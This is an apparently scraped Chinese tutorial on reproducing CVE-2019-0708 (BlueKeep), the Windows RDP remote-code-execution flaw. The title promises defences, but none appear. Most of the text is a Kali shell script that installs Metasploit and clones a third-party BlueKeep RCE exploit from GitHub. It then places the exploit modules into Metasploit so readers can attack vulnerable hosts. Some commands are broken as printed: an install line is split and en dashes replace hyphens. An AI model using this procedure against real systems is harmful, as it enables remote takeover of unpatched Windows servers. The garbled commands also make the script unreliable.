CVE-2019-0708復現和防御手段是什么

發布時間：2021-12-22 21:02:31 來源：億速云閱讀：191 作者：柒染欄目：網絡管理

CVE-2019-0708復現和防御手段是什么，很多新手對此不是很清楚，為了幫助大家解決這個難題，下面小編將為大家詳細講解，有這方面需求的人可以來學習下，希望你能有所收獲。

一、漏洞描述

Windows系列服務器于2019年5月15號，被爆出高危漏洞，該漏洞影響范圍較廣如：windows2003、windows2008、windows2008 R2、windows xp系統都會遭到攻擊，該服務器漏洞利用方式是通過遠程桌面端口3389，RDP協議進行攻擊的。

二、漏洞利用方法

為了測試方便，直接扔出自編的一個腳本，按下面步驟做就可以，使用kali linxu系統。

1. 建立一個腳本文件*.sh，同時chmod +x *.sh付給它可執行屬性

2. 直接復制如下代碼到*.sh，然后./*.sh運行即可準備好攻擊環境（注意：腳本幫助更新了MSF，這一步是必須的！不然框架加載不進來）

#Update your MSF
apt-get update
apt-get install
metasploit-framework
#Download cve-2019-0708
git clone https://github.com/NAXG/cve_2019_0708_bluekeep_rce.git
#Mkdir for cve
mkdir –p /usr/share/metasploit-framework/lib/msf/core/exploit/
mkdir –p
/usr/share/metasploit-framework/modules/auxiliary/scanner/
mkdir –p
/usr/share/metasploit-framework/modules/exploits/windows/rdp/
mkdir –p
/usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
#Copy .rb to target dir
cd cve_2019_0708_bluekeep_rce/
cp rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/
cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/
cp cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/
cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/

CVE-2019-0708下載后包含2個模塊，一個掃描模塊cve_2019_0708_bluekeep，一個攻擊模塊cve_2019_0708_bluekeep_rce，直接使用攻擊模塊就可以。

CVE-2019-0708復現和防御手段是什么